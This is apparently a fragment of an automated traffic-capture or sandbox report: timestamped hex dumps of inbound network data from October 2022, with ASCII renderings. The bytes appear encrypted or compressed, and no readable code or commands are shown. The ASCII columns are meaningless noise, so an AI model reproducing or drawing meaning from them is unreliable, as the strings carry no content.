                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21640INData Raw: 3e b3 73 ad 19 c7 74 e2 47 71 3f 88 a9 f2 84 a7 33 9f a1 b2 d6 29 77 d0 c4 87 92 e6 4f a1 bd 47 d6 07 e8 4e 77 25 7d 73 db fa c5 d8 63 e0 50 ac 83 d9 fc 29 c3 9a 72 25 0f 8d b6 cb f1 10 94 13 eb f7 0b e7 3f 7e a2 5c c1 14 22 c5 75 e6 f6 57 ac b1 fd ce 88 c6 8a fb da 64 e3 05 c4 76 26 77 53 7b 1f 88 87 02 fc 7d e3 e1 b4 2d f1 f2 03 2e e5 51 b7 61 f5 31 3d f4 22 3d 15 38 36 38 1a 76 07 f3 b9 6e 17 dd 7a 1b 68 a3 58 40 25 0d 90 45 d8 ba 54 7c 4e bf f8 38 03 86 f1 96 c5 e2 f6 ae b7 02 f6 fd c5 45 ac dc fb 51 e7 4d 35 f5 5c f6 6e 32 7f 5d b6 e5 6a 93 a0 bf 1e ba 3e 01 d2 3d 38 96 81 88 f1 c2 5e 07 e0 54 de 02 60 7a 23 e2 88 2c ca a4 f7 f2 4c f1 72 33 08 94 09 cc dd fd d1 8b 47 e3 99 5a 7e 00 94 b8 f2 71 97 15 bb 6f 87 65 f9 54 e8 c3 18 ba 31 ee a5 5b b7 02 72
                                                                                                                                                                                                                                    Data Ascii: >stGq?3)wOGNw%}scP)r%?~\"uWdv&wS{}-.Qa1="=868vnzhX@%ET|N8EQM5\n2]j>=8^T`z#,Lr3GZ~qoeT1[r
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21656INData Raw: 5b b8 82 08 0e 71 d0 f2 3e f1 b9 b3 a8 93 43 11 16 18 3d bb bd 88 af 79 0a df 0d 12 c8 45 ee 0e be 80 a1 c6 46 83 d8 91 75 af b6 01 6e 16 dd 9f 11 e4 4c aa a0 e9 2d c4 e0 09 c0 45 82 36 5c f0 59 84 f0 5e 10 f8 1c 21 9c a1 ce 49 e6 d7 a3 4d f8 09 92 a3 9f ba a4 cb 99 2a c3 bf bf a2 73 ed 5a fd 8c 3c aa 17 c0 1c a5 eb 86 41 2e 46 f3 99 f3 86 48 48 14 3c 99 bb 26 3b a3 24 8f 96 88 42 25 a6 59 43 d4 87 04 b5 38 a8 1f 32 b4 b0 2f 84 a4 04 60 5b a1 8c b0 23 a8 16 1c da b5 8c 6f 44 cf 6d 09 4f 23 67 df ee 8b e6 3f 71 2e 1b d9 b1 bc b9 6d 67 77 7b 37 61 5a f1 b4 fe ee ef 04 84 86 7d 3f 5d bc 1e 22 e1 52 f7 5f 37 51 a5 22 0b 27 8b 5a 6e 34 f0 72 31 f2 a3 b5 fc d7 33 1b 56 68 e7 be 64 5f e3 9e f0 c9 46 94 01 77 f7 fe 92 38 06 86 03 6d d2 1a fd 54 83 ec 17 6e 5b d5
                                                                                                                                                                                                                                    Data Ascii: [q>C=yEFunL-E6\Y^!IM*sZ<A.FHH<&;$B%YC82/`[#oDmO#g?q.mgw{7aZ}?]"R_7Q"'Zn4r13Vhd_Fw8mTn[
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21672INData Raw: 4e ab db 9c 5a 51 4d ba 6f 24 24 9c 00 7a a9 19 bc 25 61 a8 b2 eb 83 5b d9 bf a4 e1 4b 00 14 70 5b 7e 27 61 4a 9a ca 41 31 b0 0c de 89 0f 20 21 c6 6f a7 b0 91 03 61 93 8f 47 8a 91 e7 7e f6 1b 2d fb 50 f4 f2 3d f0 5b 62 29 86 65 ca 04 a3 1b 4c 10 1b f2 82 ca a3 03 21 4e ea 9b 77 5e db d3 e8 76 3e 47 e2 46 76 f2 55 4e 4f 33 6c d3 f9 e3 34 43 81 52 f6 34 44 94 f5 96 70 46 59 ab d6 eb 41 b5 fe 78 4e ab 3e 63 94 a0 eb 22 4a 3f fd 91 6a fb 63 81 32 a6 a2 6e 53 2b 70 e0 78 8b a9 1a dc 42 4f 2e 8b c6 e5 f3 af 20 30 67 64 9d 52 61 ed ff ad a7 a4 52 db d1 69 90 98 03 60 6e be ce 21 95 ce 0b f1 16 80 5a 72 d2 57 0a a4 c0 57 7e 4d f9 6a 43 ee 60 43 d6 8b e4 09 37 a5 4d 85 41 d5 7e 22 65 e7 b8 3b e5 3b 6f 6a 88 8c d2 23 25 72 25 4e e0 10 2e 3b fa 2a 69 fa cc 0f 96 1e
                                                                                                                                                                                                                                    Data Ascii: NZQMo$$z%a[Kp[~'aJA1 !oaG~-P=[b)eL!Nw^v>GFvUNO3l4CR4DpFYAxN>c"J?jc2nS+pxBO. 0gdRaRi`n!ZrWW~MjC`C7MA~"e;;oj#%r%N.;*i
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21688INData Raw: d6 7d 1a 1e 5f 52 b7 aa fe fd dc e1 42 73 59 1f da 9f b8 d0 46 02 17 93 77 4c 1e 4d 66 60 9d 34 b1 d0 c7 ff 2c 9a ab ca 22 1b 9a c8 3c f3 1c c3 25 e9 c5 77 db bf b3 ba d7 94 ca fb e8 3d e4 fa c6 d3 a6 6a 3a 15 39 16 4a 37 a3 2c ee 68 11 e1 4c ef f4 7e e2 7b 3e 52 19 e4 62 34 58 56 46 bf ad 34 f7 32 48 64 5f e1 f3 55 7c 16 3a 14 0b 61 8d bd d0 59 e3 b1 d8 08 7d 66 02 92 36 a1 90 5d e0 e0 87 aa d5 c2 55 38 b0 b1 54 82 8f 06 3f 6d b3 b7 93 9e 3b 88 5d 3e 2a 2d 05 34 f5 ca 07 f1 fa 4f 2a 10 ce a5 3a 49 1a 52 65 e5 b6 8c 9e 7a 8c 69 fc f2 d6 06 97 5d c1 ce 62 18 3f ad 05 63 7d cf 58 55 18 e3 31 4a 57 c8 29 ac 25 dc 32 bf c3 dc 2e 50 fe d1 e3 c9 47 ec 57 21 1d 7b 10 3f ca 45 92 ba 5d 5a 7c 0e 07 0a 78 aa 0a 91 e7 cd be 89 58 91 73 75 7a a0 59 49 f2 ef a1 31 ed
                                                                                                                                                                                                                                    Data Ascii: }_RBsYFwLMf`4,"<%w=j:9J7,hL~{>Rb4XVF42Hd_U|:aY}f6]U8T?m;]>*-4O*:IRezi]b?c}XU1JW)%2.PGW!{?E]Z|xXsuzYI1
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21704INData Raw: f7 7a d1 29 5a da b0 4f e8 eb 4b 6a 1d 06 aa 09 be c5 31 4b cd 7f d9 db fe 2c 9b c5 11 25 bf e4 da 62 11 36 15 35 e2 e7 42 8b 04 45 eb a8 2e 6c 6c 02 f3 1d 90 c4 4b e1 9f 73 8f f5 91 c7 83 90 8b 1c f7 85 dd 58 a0 a5 92 96 66 2e b9 b2 63 cb 44 14 ab 02 b4 35 b6 8f ca 19 ac 8e 4c 39 23 14 ca 1c 87 be a6 56 bb 1e a1 6b b5 3c 8a fd 79 6f 13 fc 7b e2 33 1a b7 67 74 a6 63 60 7e 66 11 ec cb 95 92 53 c9 a1 26 45 e2 da 42 4c c6 34 c3 01 e6 3e 87 05 ae 81 64 28 05 8c b7 75 66 c3 97 f9 79 c1 78 41 bf 1b 0a 9c 21 bd 8b c5 fd e2 70 11 ac d1 21 97 d0 bf cb 72 55 0c 22 a3 f7 69 6b a9 cc d9 e5 d4 86 a4 8e e4 27 54 f7 8a ae 05 9f a7 c7 7c 23 34 99 06 6f c0 03 46 1f bc 5b 41 51 fc 50 44 69 66 28 b3 bd 8e 17 7a d6 08 41 e4 7d a9 01 ff 0b f0 58 01 39 63 d7 14 20 d9 1a 80 10
                                                                                                                                                                                                                                    Data Ascii: z)ZOKj1K,%b65BE.llKsXf.cD5L9#Vk<yo{3gtc`~fS&EBL4>d(ufyxA!p!rU"ik'T|#4oF[AQPDif(zA}X9c
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21720INData Raw: 45 48 14 73 b2 02 91 6a ce ac aa bd f9 6a d2 68 dd d4 e5 eb 34 9b 4f 33 82 fd e5 aa 33 0f e9 fd a8 56 89 c7 98 92 fb 49 f1 a2 4c bf 47 44 32 35 bd 86 0c b8 a0 b1 98 9b 8e 10 58 f3 3f 0c 32 d2 d2 ba 27 e9 d8 42 b4 7c b7 11 e7 4e 9e a4 d8 01 0d f6 81 da fc 1f 56 47 2a 70 87 5f 78 b9 56 7d 70 78 e3 a3 96 6c 06 6a ad fd 37 3a c4 e5 52 10 b0 29 20 5b 15 b5 69 44 b0 fd 1c 81 73 75 25 d8 30 96 9e 83 30 f8 1e 93 bf b2 30 7f f2 67 cb df 65 5c 05 ba b4 f4 5d 1f 24 2e 5a 84 01 81 65 46 6f 75 b9 f9 78 67 3e 8e ba 5d 3a 68 f0 89 a8 62 f3 ce 46 46 49 10 31 31 fe b0 61 b6 52 4e 19 8c e1 51 01 ce 4f 7f ec 1c a7 ee 4c bb c6 2b 91 1f 6b 4c 19 13 0d aa 83 5b c9 25 33 1a ec 84 43 ad fd 9b 07 c8 1f 27 39 69 49 c8 de ab 49 b1 e3 8d 3e 1a 4b ce fb 39 02 ea 02 3c 80 4e 85 ab a1
                                                                                                                                                                                                                                    Data Ascii: EHsjjh4O33VILGD25X?2'B|NVG*p_xV}pxlj7:R) [iDsu%000ge\]$.ZeFouxg>]:hbFFI11aRNQOL+kL[%3C'9iII>K9<N
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21736INData Raw: 2e 19 89 19 2e 0e 48 f5 f4 ee 94 83 06 a2 4c 14 99 61 e7 10 2f f5 21 4b d1 8c 73 7b 13 ed 23 96 a4 4b fb 0a c8 1d 9a c7 33 ab 6d 9d ac a9 3e f9 60 5b 83 e1 2b 21 4f db 1c ff 67 f1 ae 86 67 3a fb 88 06 9b 3d d7 7e fe 8d 9f 1a 83 ba 47 d4 28 e7 96 ab d6 c9 49 aa 08 ba d7 d5 4e ca 33 57 fd 8f 14 36 a5 3b f4 96 e6 db 52 87 73 70 ba 5c 3f e5 5b a1 b9 66 88 30 24 fe 0e e3 43 51 80 1c 47 b5 ed 7c 31 b6 4a 82 2b 8a 75 e6 50 e1 df 31 79 32 e9 5c a8 88 bd 3a 97 ae 65 1c 7a f2 3a ad 9e 2d f3 ad ee d8 22 bf e3 90 22 3b 74 25 62 22 ab f5 3b cb dc d4 22 9e ef db 5c d9 f3 c2 d2 bd 7e 91 07 40 41 9c 49 41 5a 40 c8 00 11 24 a5 fb 62 a1 1a 9b a8 83 0f e9 a0 33 78 a8 06 95 35 4d 56 8c 79 47 72 75 b6 52 be 82 a9 1a 1a 94 65 a3 0a 46 15 2e 93 c4 c6 da 3d 25 8d 19 92 26 b8 95
                                                                                                                                                                                                                                    Data Ascii: ..HLa/!Ks{#K3m>`[+!Ogg:=~G(IN3W6;Rsp\?[f0$CQG|1J+uP1y2\:ez:-"";t%b";"\~@AIAZ@$b3x5MVyGruReF.=%&
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21752INData Raw: 76 40 df df 0e dd a7 f3 41 19 6c 07 01 aa 36 34 09 13 ea d1 40 a6 fc 13 8d 77 f3 c0 8b 7d 05 7b 97 f4 7e a2 41 17 70 8d 9b b1 88 e4 c7 8b e4 c4 ae 11 53 0c e6 b9 b6 13 ae 6d a7 1d 1d d6 87 e4 bd 76 b0 d9 37 be bc 75 32 e0 19 ea 7e 5b 45 c2 fe 67 63 d7 bf 73 1a 0a a9 4f 47 c4 a3 eb 98 da 54 ec 67 85 de e3 a8 c7 5c da 3d 41 6f 26 c5 28 10 1a 53 fc 0c ea e8 1f c3 3b 94 22 31 06 de 71 7b c3 cd b3 63 79 2f c9 1a c1 fc a5 77 c0 76 d5 e8 68 d1 71 15 67 f7 4c 12 b2 4c 9f 80 b4 75 a5 ac 29 93 51 be 39 7c 88 31 62 d8 fd 9e 2f 35 a7 d0 78 ab 76 06 9f 17 a2 70 98 ed 04 3c 95 7d 48 99 eb ff 16 d2 21 ae bf 7d 07 2a 5d d4 63 dc 84 f1 c1 a9 a7 11 47 7f 72 7e 7b a3 dd 2e a7 85 d0 1d 37 d9 5a d1 31 3d c0 ae db 3c 60 76 08 2a 31 3f 22 b7 32 e4 3f 0c e7 3c 3f 01 12 32 03 08
                                                                                                                                                                                                                                    Data Ascii: v@Al64@w}{~ApSmv7u2~[EgcsOGTg\=Ao&(S;"1q{cy/wvhqgLLu)Q9|1b/5xvp<}H!}*]cGr~{.7Z1=<`v*1?"2?<?2
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21768INData Raw: 75 8b 36 44 d2 f4 a0 ab 2f ba 28 db 71 97 09 87 11 0b e3 a0 24 d4 bc a7 8c 74 aa 7b 80 ef 32 57 c0 86 5d 97 1f 38 45 ff b9 4d 7c c7 c8 5b a3 b2 ae 45 99 cf b8 8a e6 cf 80 97 a3 bb 31 f5 2f 00 21 61 f2 50 64 c6 41 85 0f 26 d3 6e 59 48 b1 93 4d 94 3d fc 8f 23 83 ad 86 82 09 b3 90 19 2c 1a bb db bc 92 10 5c fc c1 cf e7 8b ea e0 5e 94 3e c3 21 2f c1 eb 56 ac 91 e3 4b 46 49 63 81 00 f2 b0 86 fd 53 ab a3 f7 70 ef a8 34 7a b3 24 b3 72 a8 f8 73 4e 45 ec f3 23 fe 47 33 df cc 63 27 68 1a 39 af 66 1c c9 f1 cb 95 de 3f 87 e5 61 ce 55 74 3c 5a a5 e2 c4 86 37 ab 01 98 72 5a da 84 f2 04 d5 7f 45 b6 14 e3 23 9e 41 4b df dd 6c 40 76 5b c3 36 d8 eb ed 87 c2 b9 fa cf 13 af 1b e5 2c cf 5f fa bf fd 7d e6 e4 82 1a 77 60 79 69 6a 36 59 06 ad a5 54 89 d7 c6 6b a4 89 e8 f9 65 02
                                                                                                                                                                                                                                    Data Ascii: u6D/(q$t{2W]8EM|[E1/!aPdA&nYHM=#,\^>!/VKFIcSp4z$rsNE#G3c'h9f?aUt<Z7rZE#AKl@v[6,_}w`yij6YTke
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21784INData Raw: ea 8a cf 04 9b 17 91 74 50 83 4c 58 22 a8 d5 97 24 cf d7 f9 d4 1a 40 a5 5f 3d 29 78 3f 9f f0 f0 c8 4d 33 c7 21 be 15 d3 35 3f af 78 97 be 21 29 53 5b 17 c1 77 fd 36 d5 97 b9 2f 2c 40 ad c9 7b 8f 00 83 1f ac 49 e9 29 35 4c 05 ba bd d7 df 64 4f e4 e8 42 4e ec 95 cf 0e 32 bf 57 2a 6b 33 14 87 54 ad 43 1c cf 18 db 2e 3e 88 b9 38 23 c2 c0 8b 26 fc 06 e5 9c 74 db 78 33 bd 68 35 1f 33 07 51 5b e5 dc ea 88 a4 82 87 f8 5b b8 18 86 79 bd 03 bc 18 17 10 ce 54 a4 78 38 ec 22 46 e6 3e 9b c0 75 10 59 de 76 7a a1 f6 a7 15 34 47 ba ba 3f e2 eb d7 f3 12 8e 2e 11 87 47 93 5e e0 30 6e 61 19 66 90 a6 76 e2 0e f5 61 d2 5a 44 da de dd 67 d2 d1 5b d8 3f ca 16 f3 d0 60 bf f8 9f c6 54 84 20 8e 16 09 ae ae fc a7 7d 01 1c 89 25 82 2c eb 87 9a c2 3f 0f f4 60 ff 73 be aa 61 5e c3 ca
                                                                                                                                                                                                                                    Data Ascii: tPLX"$@_=)x?M3!5?x!)S[w6/,@{I)5LdOBN2W*k3TC.>8#&tx3h53Q[[yTx8"F>uYvz4G?.G^0nafvaZDg[?`T }%,?`sa^
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21800INData Raw: 76 e0 d0 4f f2 c1 e2 e2 4e 92 2f fb 2b 21 44 2a 51 b6 ae 3a 77 28 8d 52 20 c0 3b 80 8d 88 f2 40 08 9b 13 7a fa 2e 24 6c 05 ba f9 16 44 21 cf a1 ce 41 20 5a f8 2b 5a a9 df 23 44 0f f1 df 1b 9a f2 29 62 1b 9d 21 83 82 ca 1e fe ac 0f 4f 29 f1 4c 23 cd 2c 70 e6 b5 45 e1 68 dd 2e 90 e1 05 91 0e ce e5 36 c8 44 e9 fc d9 82 77 8e ae bd 3f 35 f3 89 2c 0c b4 1b 89 b9 ae b2 78 10 d8 01 49 e8 3e e2 92 de 66 6c 6e f2 2b 61 8f 67 85 86 6f cb bd b0 1d 0b bb 8b b7 d5 08 24 4e 7f f3 f1 6d 18 1e 4b d7 3d ef 1f 9f 28 04 9c 90 a7 29 08 1e 42 2c 82 7a ee 54 aa 1c 95 fe 91 8c 70 8d a0 f3 0f ea 07 82 60 eb 60 7e 3d 2c 59 66 f6 4e eb a1 90 2c 67 94 ca 92 b5 eb b4 78 2e 16 f3 d0 77 b8 97 1b d1 9b 41 9b c8 ac 6c a4 b2 cc 99 ae c7 d7 33 b1 67 25 c6 b3 b2 a3 18 c2 4f 53 c0 ed 5d cd
                                                                                                                                                                                                                                    Data Ascii: vON/+!D*Q:w(R ;@z.$lD!A Z+Z#D)b!O)L#,pEh.6Dw?5,xI>fln+ago$NmK=()B,zTp``~=,YfN,gx.wAl3g%OS]
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21816INData Raw: e8 d3 45 6c 95 a4 fe 31 f9 17 52 d3 68 51 48 88 d2 90 6c bf 65 43 b5 28 76 a9 48 b4 64 b8 ba dd 8a 3a 78 c1 63 53 5e 54 6b 7f fa 03 3a 02 e5 ee bb 0e 23 92 78 a0 d6 ff 1e 20 5b b2 28 02 be ce 80 ac 38 0c b4 93 19 84 98 1d 95 5a 6e 59 5c de 7b b8 08 13 94 98 97 1e e3 d5 4d e2 2d a4 4b 34 0a 4e 1e 7d 46 75 bd b7 ff 6a c1 9b b9 4d 92 64 27 cc 9f e8 f0 94 70 29 22 51 50 da b7 a7 b6 ee 99 d5 31 df 27 8e 2c 70 c4 72 de a3 50 2d eb 8c 10 91 8c 11 e5 bc d2 e7 f3 86 00 cc 67 3c 4e 8d c3 af fe da 61 55 74 22 d6 87 a2 bf 21 08 63 fe 38 8f 80 6b 0f a4 83 f3 c9 2d 2d d6 c4 f8 67 28 88 89 6b bd 37 3b 9d d1 74 7a b2 aa 66 5d 3c 3d 95 42 60 e6 03 1e 25 ce 0f dd 50 97 8d 0c 5d 53 27 fc ad a0 a5 f1 b2 51 27 59 06 fb f0 5f 26 43 4a df 86 8c 71 90 e6 48 f7 20 57 39 88 d1 b2
                                                                                                                                                                                                                                    Data Ascii: El1RhQHleC(vHd:xcS^Tk:#x [(8ZnY\{M-K4N}FujMd'p)"QP1',prP-g<NaUt"!c8k--g(k7;tzf]<=B`%P]S'Q'Y_&CJqH W9
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21832INData Raw: f9 a6 7e 30 cb 25 19 5e 9a 2d c9 a6 ec 91 54 42 48 06 23 6d cd c0 9b 0d 9d b6 36 97 0c 12 f2 fd 6e 16 e5 e5 22 d9 fe b6 c2 c0 ec 43 0a aa fb 05 27 15 25 61 6a 52 fa c8 40 09 a2 61 40 9f c3 f0 62 c0 3b 70 3a 54 cc 05 5e b7 45 7e ee 6d 99 4e ad fd b3 97 70 e0 b6 7c af c9 b6 bc ff ed 87 2a e5 c2 ed 85 53 36 54 06 3b 65 fa 5e fa 3e bf 6e 24 d5 25 8d 02 5d 09 c8 a0 02 a5 42 fb 89 b1 04 32 69 28 bf 7a d5 d8 f4 5e 07 42 c5 28 83 b9 1f 8a fd ff d5 6a 3c 9b a4 ba ea b6 80 8f 93 ce a9 6d f2 8f 96 13 e0 21 19 98 80 c5 8c 3c 3e d1 1d d2 c9 bb 4e 49 33 c6 09 d9 09 0f 83 a1 f6 91 ab 1e 99 ed fc 58 76 b7 87 7f d5 5b 7d 8f bf db 89 20 87 5e aa b8 09 4c ad 6c b2 5c 84 c3 a0 80 d1 e4 de f3 ab b3 e3 1b f9 88 ed bf 7e 6e d7 5a 33 1b af 8c 75 8d 30 b3 48 93 ea 07 b8 6c ca f6
                                                                                                                                                                                                                                    Data Ascii: ~0%^-TBH#m6n"C'%ajR@a@b;p:T^E~mNp|*S6T;e^>n$%]B2i(z^B(j<m!<>NI3Xv[} ^Ll\~nZ3u0Hl
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21848INData Raw: 8c fc 16 5b 4a 89 d3 17 0f 31 7e 6e 84 96 8e 4e 7a c1 b4 c5 36 89 4a a8 a8 13 61 b8 dd a8 d3 40 be c5 de 8e 2c 66 45 72 e9 a2 a7 c3 1d d6 82 75 21 85 ff 2f 24 d7 3b f1 fe fb 87 14 e8 e2 75 90 e4 03 22 3a f5 15 a3 d6 53 49 16 ee a2 63 59 9f 3a c4 89 77 dd 4a 08 3f 77 d2 fa 66 52 32 f4 c0 1c a7 f5 bd 6d 23 49 a9 0d 7d 69 4f 4a 93 a0 46 2d 36 5c da 3c db bb a9 36 da ca 75 ae 1e 57 1e 46 c1 57 aa ae 36 0b f3 06 5e 16 22 44 98 11 16 42 62 dd 96 b7 89 38 a9 56 43 f5 4c 7e 1e 51 0f 33 d1 3f 8d 48 f6 a0 e0 5a 6c 37 a1 1f 1d 25 10 78 64 2b 45 78 e5 9e fc 6e 1e 43 fa f0 fb 8d 78 24 7f 53 06 91 d9 67 2c 28 b8 47 80 4f a5 54 64 2e 14 41 2f 6c 8f 6a 7f 21 00 7b b6 0c 93 b9 11 e6 ed 95 68 d7 80 bc db 86 1b b1 a6 60 9f 1e 87 bf 1a d9 d6 0c 0b ea 7f e8 1a ca 49 8e 11 40
                                                                                                                                                                                                                                    Data Ascii: [J1~nNz6Ja@,fEru!/$;u":SIcY:wJ?wfR2m#I}iOJF-6\<6uWFW6^"DBb8VCL~Q3?HZl7%xd+ExnCx$Sg,(GOTd.A/lj!{h`I@
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21864INData Raw: 95 20 7e b9 3c ff ae cb 5e ca c3 39 d9 4c 31 7f e4 6e 87 a5 a1 41 1a a0 1b ba cb b7 15 69 13 01 e3 b0 8d 85 36 fe 85 38 11 c0 96 37 55 f8 d7 7b 5f 1f 19 3a cd e1 0d 66 7d 07 1f 1c 8b e3 9f 29 66 e8 8a 1a 47 93 e4 96 a9 44 3f 04 7d 1c 9c 30 d3 98 a4 e8 6c ef de f5 6a af ea ee 73 7a 77 62 00 11 56 97 f7 be 80 03 67 12 a6 55 ec 3e c3 d9 ed 0b 8d ab c1 20 7e 94 f2 6d 45 72 97 63 c0 d4 d9 ca 9a 6b 84 1d a3 70 5d f3 f5 7f 7f 36 66 d3 55 d9 4e ef e2 82 05 73 2b e9 7e ef e6 41 74 f0 85 01 f3 b6 f6 83 c8 be f9 0a 47 7d 49 e2 08 fd 7d e0 a0 f3 30 e3 ac e4 2a 11 fb a9 08 ad 04 62 8e 96 da 60 09 09 75 a6 74 1c 73 ba 66 a0 f9 90 53 38 9a 2a 71 0b a5 f1 03 97 43 85 cb 16 d4 6e 1d e6 33 3b 2c c8 1b 29 ee 93 21 f8 3d 23 38 23 c0 8b e6 ce 70 8a d1 89 fe 30 b3 b3 e1 3b e9
                                                                                                                                                                                                                                    Data Ascii: ~<^9L1nAi687U{_:f})fGD?}0ljszwbVgU> ~mErckp]6fUNs+~AtG}I}0*b`utsfS8*qCn3;,)!=#8#p0;
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21880INData Raw: 8e 61 cf 41 46 f7 95 9c e7 a6 1e 61 2b 44 0c 41 33 27 6c 5c d2 36 0c e1 47 08 0e 86 e8 0c cf 12 6a 64 bf 12 20 82 83 86 4f 12 c6 30 91 34 f6 ee c4 78 34 cc e2 64 e3 d8 98 ec 6b fa d3 9b 36 5d 95 26 44 f2 0f c0 b2 ff 58 25 b5 21 75 db dc 93 a1 e8 c9 82 ca 1e 67 28 57 67 58 a3 1f 8b 34 06 c0 4f 26 2d 35 a5 20 1b 67 53 d2 bd 49 8d ee 14 ec 7e 5b cb f8 04 7e df 38 ae c1 2f 34 bb d0 26 93 4a 23 df 86 a8 e6 0c 19 a4 b7 da 45 e0 10 ec ab 6a 71 21 7e fd aa 6d 4f 82 39 9b 0a f5 7e c7 d2 22 90 df 8c ce 87 41 80 54 2e 42 ee b3 7b 35 da 57 27 df 94 18 9f eb 97 4d 40 aa 0a 6e c6 49 e5 42 99 f9 55 bc 35 0a b1 46 24 0e fd 05 33 d8 6d 59 c9 e2 6e 75 3d 2d 85 f5 e9 bb 21 91 36 fe 5d f8 74 9e c6 75 f8 e5 89 7c 7e fa 0e 19 4f bf dd 29 70 3f 37 fb 97 8c 70 0e b4 04 fd b6 fb
                                                                                                                                                                                                                                    Data Ascii: aAFa+DA3'l\6Gjd O04x4dk6]&DX%!ug(WgX4O&-5 gSI~[~8/4&J#Ejq!~mO9~"AT.B{5W'M@nIBU5F$3mYnu=-!6]tu|~O)p?7p
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21896INData Raw: 8c f1 80 e5 d5 a6 f3 69 1a 3d 09 07 1e dc f7 a5 16 8c a9 f9 59 8e d6 87 e3 61 9c e3 e8 b8 88 43 4d f2 5a c1 5f a1 5e 76 5a 01 69 2e 43 d8 c0 6e eb 10 02 b8 99 cd ba 3e 09 6a 60 49 89 d3 5a e3 a5 6d 6c 6b 16 8d 47 00 f1 8a 41 ef 95 51 ec 07 29 ee 5e 42 68 81 21 64 b1 ad 16 41 89 c3 33 b9 a1 aa ab 26 0f a2 29 4f 83 8f 5e 4a 76 3f 5c 3d bb a1 c7 d2 f7 78 c2 45 75 db e5 7d de ab 5c 1d d5 b2 97 32 13 96 75 6a 3e ce fe 4e be 2d c1 28 a9 60 68 53 30 68 8e ec 0f 02 25 2d 6c 17 3a a6 63 a4 ab 7c c3 3d bc dd a5 8f 2f b3 80 fd 2a a1 df 28 55 20 d4 7f f9 a9 98 92 89 b8 cc 76 29 75 6c d1 80 8e ea 27 f3 11 9f 49 33 d0 08 13 3f 7c 18 a2 3a 98 0d 38 3d f2 90 cd e1 4c 19 96 9f 58 95 2f 31 4b af cd 2b 74 dd 14 3c 60 53 98 cf f7 40 54 b0 8f e1 2d bd 85 05 f5 73 74 7b 95 d0
                                                                                                                                                                                                                                    Data Ascii: i=YaCMZ_^vZi.Cn>j`IZmlkGAQ)^Bh!dA3&)O^Jv?\=xEu}\2uj>N-(`hS0h%-l:c|=/*(U v)ul'I3?|:8=LX/1K+t<`S@T-st{
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21912INData Raw: b4 c4 b5 cb c2 f0 34 cc 39 74 83 c5 eb 0d 96 5f ce e5 a6 68 a2 c2 b7 e5 76 0b a8 1b a8 53 bf 46 fe 91 ac 56 03 71 c6 d3 d1 00 16 c4 c4 da 38 2b 0a 37 37 d6 2f b7 b0 f4 c3 1f 51 df e5 ef 15 10 89 87 5b d6 0d 24 98 2a c2 0f 87 65 b2 c0 fe ea 03 2a 77 50 a6 73 47 ca 3f d1 5f 5e 14 f1 68 06 7e cb e6 4c 5d 73 3e ae 17 0c 5e 30 8b bd 4a 65 62 1e 26 0c e7 2a d2 aa 0e 77 b7 6f 1a 97 2c 23 ec 4d e4 cf cd fa 14 c6 d9 fc 91 f8 b4 e9 f4 86 ef 1e 46 06 aa da 92 e9 c3 d2 b1 4d 3d 32 f4 be f4 4b 0b 26 a6 9f 5c 91 ce ea c5 d8 04 03 df 86 34 6a cd 74 3b bc 27 90 e6 9e fa 23 88 ef 71 1d 95 df e3 18 2c 8d 4f 2b d7 66 0d f6 87 4a c8 2f ad 6e fe 62 65 d6 ed 04 6d a9 49 63 8a 73 73 0a dd b7 5c c8 d6 93 8d 0d fb c9 26 a0 82 a4 6e a4 24 b2 b9 38 19 8d 60 b4 00 11 79 d6 ef 1b 75
                                                                                                                                                                                                                                    Data Ascii: 49t_hvSFVq8+77/Q[$*e*wPsG?_^h~L]s>^0Jeb&*wo,#MFM=2K&\4jt;'#q,O+fJ/nbemIcss\&n$8`yu
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21928INData Raw: 2b 04 fe fe 55 3c ad ac 94 cd 3a e8 df 9e f4 72 3c 53 e8 65 34 77 39 ef ee 02 5e c5 ce 63 be 0d d7 18 da ae 50 dd b3 0e c7 46 23 39 64 14 f4 77 83 e7 63 3f 0e 25 c7 1f 93 3a 66 f3 07 a8 30 d2 2d 79 0d 08 02 36 dd dd 9b d0 a1 d9 45 d8 4e 0a d8 35 d8 cd 75 ef 88 a8 bc 97 48 dd 94 0a 48 5e b4 b8 5d 6a 73 88 62 6d 9b ac 32 a7 46 42 f6 47 34 a1 5f 33 c8 60 70 64 3b d9 0a ea 5f b5 d3 02 82 55 10 81 93 22 a9 f0 b0 06 e8 ea 0c 60 eb b5 16 6b 82 a8 f6 c8 3d 8f e9 e1 d5 6a 1b 32 a2 38 a8 a7 49 e6 fd aa c1 1c 05 ac fc 1d 0e 1c df 67 9a 39 8c bd ac f0 06 f2 39 c2 16 7f 3f 8e 34 ae 55 5d 07 9f ac 43 6a fa 88 d9 f4 0f 4a 09 8d c1 5a 87 8e 26 a4 64 9b c9 4b df 46 fd 67 12 90 73 9e 90 77 06 7b 6a 1c cc a3 f2 0a ae 5b 91 21 8f 5d 1e 25 09 d9 f1 14 ca c1 85 f8 03 ef 3b 19
                                                                                                                                                                                                                                    Data Ascii: +U<:r<Se4w9^cPF#9dwc?%:f0-y6EN5uHH^]jsbm2FBG4_3`pd;_U"`k=j28Ig99?4U]CjJZ&dKFgsw{j[!]%;
